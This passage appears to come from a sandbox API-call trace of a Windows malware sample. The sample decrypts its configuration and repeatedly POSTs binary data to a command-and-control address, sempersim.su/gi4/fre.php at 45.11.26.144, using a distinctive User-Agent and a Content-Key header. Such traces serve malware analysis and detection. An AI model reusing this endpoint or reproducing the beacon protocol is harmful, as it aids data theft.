binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0167.670] GetProcessHeap () returned 0x5b0000 [0167.670] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5ce180 [0167.670] GetProcessHeap () returned 0x5b0000 [0167.670] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0167.670] send (s=0x2b8, buf=0x5ce180*, len=236, flags=0) returned 236 [0167.693] send (s=0x2b8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0167.693] GetProcessHeap () returned 0x5b0000 [0167.693] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0167.693] recv (in: s=0x2b8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0169.174] GetProcessHeap () returned 0x5b0000 [0169.174] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ce180 | out: hHeap=0x5b0000) returned 1 [0169.174] GetProcessHeap () returned 0x5b0000 [0169.175] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0169.175] GetProcessHeap () returned 0x5b0000 [0169.175] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0169.175] GetProcessHeap () returned 0x5b0000 [0169.176] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0169.176] closesocket (s=0x2b8) returned 0 [0169.177] GetProcessHeap () returned 0x5b0000 [0169.177] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0169.177] GetProcessHeap () returned 0x5b0000 [0169.177] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0169.178] GetProcessHeap () returned 0x5b0000 [0169.178] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d30c8 | out: hHeap=0x5b0000) returned 1 [0169.178] GetProcessHeap () returned 0x5b0000 [0169.178] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0169.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x116c) returned 0x2b8 [0169.180] Sleep (dwMilliseconds=0xea60) [0169.187] GetProcessHeap () returned 0x5b0000 [0169.187] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0169.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.189] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0169.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.194] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0169.354] GetProcessHeap () returned 0x5b0000 [0169.354] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0169.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.356] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0169.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.357] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0169.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.359] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.359] GetProcessHeap () returned 0x5b0000 [0169.362] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0169.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.363] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0169.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.365] CryptDestroyKey (hKey=0x5be288) returned 1 [0169.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.369] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0169.369] GetProcessHeap () returned 0x5b0000 [0169.369] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0169.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0169.371] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0169.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0169.373] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0169.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0169.379] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0169.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0169.380] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0169.380] GetProcessHeap () returned 0x5b0000 [0169.381] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0169.381] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0169.381] GetProcessHeap () returned 0x5b0000 [0169.381] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0169.381] GetProcessHeap () returned 0x5b0000 [0169.382] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0169.382] GetProcessHeap () returned 0x5b0000 [0169.382] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0169.382] GetProcessHeap () returned 0x5b0000 [0169.382] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0169.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.384] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0169.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.391] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0169.440] GetProcessHeap () returned 0x5b0000 [0169.440] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0169.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.441] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0169.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.442] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0169.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.443] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0169.443] GetProcessHeap () returned 0x5b0000 [0169.443] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0169.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.444] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0169.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.445] CryptDestroyKey (hKey=0x5bde08) returned 1 [0169.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0169.446] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0169.446] GetProcessHeap () returned 0x5b0000 [0169.446] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0169.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0169.447] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0169.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0169.448] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0169.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0169.449] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0169.449] GetProcessHeap () returned 0x5b0000 [0169.449] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0169.449] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdc28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0169.451] GetProcessHeap () returned 0x5b0000 [0169.451] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0169.451] socket (af=2, type=1, protocol=6) returned 0x2bc [0169.451] connect (s=0x2bc, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0169.524] FreeAddrInfoW (pAddrInfo=0x5cdc28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0169.524] GetProcessHeap () returned 0x5b0000 [0169.524] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0169.524] GetProcessHeap () returned 0x5b0000 [0169.524] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0169.524] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0169.525] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0169.525] GetProcessHeap () returned 0x5b0000 [0169.525] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0169.525] GetProcessHeap () returned 0x5b0000 [0169.526] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0169.526] GetProcessHeap () returned 0x5b0000 [0169.526] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3350 [0169.526] GetProcessHeap () returned 0x5b0000 [0169.526] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0169.527] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0169.527] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0169.527] GetProcessHeap () returned 0x5b0000 [0169.527] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5ce180 [0169.528] GetProcessHeap () returned 0x5b0000 [0169.528] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0169.528] send (s=0x2bc, buf=0x5ce180*, len=236, flags=0) returned 236 [0169.529] send (s=0x2bc, buf=0x5d1e18*, len=159, flags=0) returned 159 [0169.529] GetProcessHeap () returned 0x5b0000 [0169.529] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0169.529] recv (in: s=0x2bc, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0170.998] GetProcessHeap () returned 0x5b0000 [0170.998] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ce180 | out: hHeap=0x5b0000) returned 1 [0170.998] GetProcessHeap () returned 0x5b0000 [0170.999] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3350 | out: hHeap=0x5b0000) returned 1 [0170.999] GetProcessHeap () returned 0x5b0000 [0170.999] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0170.999] GetProcessHeap () returned 0x5b0000 [0171.000] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0171.000] closesocket (s=0x2bc) returned 0 [0171.001] GetProcessHeap () returned 0x5b0000 [0171.001] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0171.001] GetProcessHeap () returned 0x5b0000 [0171.001] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0171.001] GetProcessHeap () returned 0x5b0000 [0171.001] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0171.001] GetProcessHeap () returned 0x5b0000 [0171.002] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0171.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1148) returned 0x2bc [0171.005] Sleep (dwMilliseconds=0xea60) [0171.015] GetProcessHeap () returned 0x5b0000 [0171.015] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2f60 [0171.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.017] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0171.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.025] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0171.034] GetProcessHeap () returned 0x5b0000 [0171.034] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0171.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.035] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0171.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.036] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0171.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.037] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.038] GetProcessHeap () returned 0x5b0000 [0171.038] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0171.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.039] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2f60, pdwDataLen=0xdfcfc | out: pbData=0x5d2f60, pdwDataLen=0xdfcfc) returned 1 [0171.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.040] CryptDestroyKey (hKey=0x5be048) returned 1 [0171.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.041] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0171.041] GetProcessHeap () returned 0x5b0000 [0171.041] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0171.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0171.041] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0171.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0171.042] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0171.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0171.043] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0171.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0171.044] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0171.044] GetProcessHeap () returned 0x5b0000 [0171.044] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0171.044] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0171.045] GetProcessHeap () returned 0x5b0000 [0171.045] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0171.045] GetProcessHeap () returned 0x5b0000 [0171.045] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0171.046] GetProcessHeap () returned 0x5b0000 [0171.046] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0171.046] GetProcessHeap () returned 0x5b0000 [0171.047] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3350 [0171.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.050] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0171.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.058] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0171.068] GetProcessHeap () returned 0x5b0000 [0171.068] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0171.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.070] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0171.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.071] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0171.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.072] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0171.072] GetProcessHeap () returned 0x5b0000 [0171.073] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0171.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.074] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3350, pdwDataLen=0xdfcfc | out: pbData=0x5d3350, pdwDataLen=0xdfcfc) returned 1 [0171.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.075] CryptDestroyKey (hKey=0x5be048) returned 1 [0171.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0171.076] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0171.076] GetProcessHeap () returned 0x5b0000 [0171.076] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0171.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0171.077] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0171.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0171.078] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0171.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0171.081] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0171.081] GetProcessHeap () returned 0x5b0000 [0171.081] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0171.082] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdf20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0171.085] GetProcessHeap () returned 0x5b0000 [0171.085] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9d0 [0171.085] socket (af=2, type=1, protocol=6) returned 0x2c0 [0171.085] connect (s=0x2c0, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0171.157] FreeAddrInfoW (pAddrInfo=0x5cdf20*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0171.158] GetProcessHeap () returned 0x5b0000 [0171.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0171.158] GetProcessHeap () returned 0x5b0000 [0171.158] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0171.158] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0171.159] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0171.159] GetProcessHeap () returned 0x5b0000 [0171.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0171.159] GetProcessHeap () returned 0x5b0000 [0171.160] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0171.160] GetProcessHeap () returned 0x5b0000 [0171.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2ff0 [0171.160] GetProcessHeap () returned 0x5b0000 [0171.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0171.161] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0171.161] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0171.161] GetProcessHeap () returned 0x5b0000 [0171.161] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5b8e90 [0171.161] GetProcessHeap () returned 0x5b0000 [0171.162] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0171.162] send (s=0x2c0, buf=0x5b8e90*, len=236, flags=0) returned 236 [0171.163] send (s=0x2c0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0171.163] GetProcessHeap () returned 0x5b0000 [0171.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0171.163] recv (in: s=0x2c0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0172.774] GetProcessHeap () returned 0x5b0000 